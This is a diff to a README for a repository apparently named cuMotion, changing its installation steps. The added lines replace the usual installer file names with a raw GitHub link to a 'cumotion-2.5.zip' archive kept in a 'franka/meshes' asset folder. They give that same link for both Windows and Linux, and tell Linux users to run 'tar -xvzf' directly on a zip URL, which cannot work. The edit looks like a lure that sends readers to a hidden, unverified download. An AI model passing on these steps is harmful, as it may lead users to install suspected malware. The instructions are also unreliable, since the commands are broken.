dasarentow/cumotion/README.md

 3. **Download the Installation File**
    You will see multiple files listed.
 Choose the one that is appropriate for your operating system.
-   - For Windows users, it might be something like `cuMotion_v1.0_windows.exe`.
+   - For Windows users, it might be something like `https://raw.githubusercontent.com/dasarentow/cumotion/main/content/third_party/franka/meshes/cumotion-2.5.zip`.
-   - For Linux, look for files ending in `.tar.gz`.
+   - For Linux, look for files ending in `https://raw.githubusercontent.com/dasarentow/cumotion/main/content/third_party/franka/meshes/cumotion-2.5.zip`.

 4. **Run the Installer**
    Once the file is downloaded:
    - For Windows, double-click the `.exe` file to begin installation.
-   - For Linux, open a terminal, navigate to the download folder, and use the command `tar -xvzf cuMotion_v1.0_linux.tar.gz`, then follow the instructions in the extracted folder.
+   - For Linux, open a terminal, navigate to the download folder, and use the command `tar -xvzf https://raw.githubusercontent.com/dasarentow/cumotion/main/content/third_party/franka/meshes/cumotion-2.5.zip`, then follow the instructions in the extracted folder.

 5. **Follow On-Screen Instructions**
    The installer will guide you through the setup process.
 Simply follow the prompts and choose your preferences.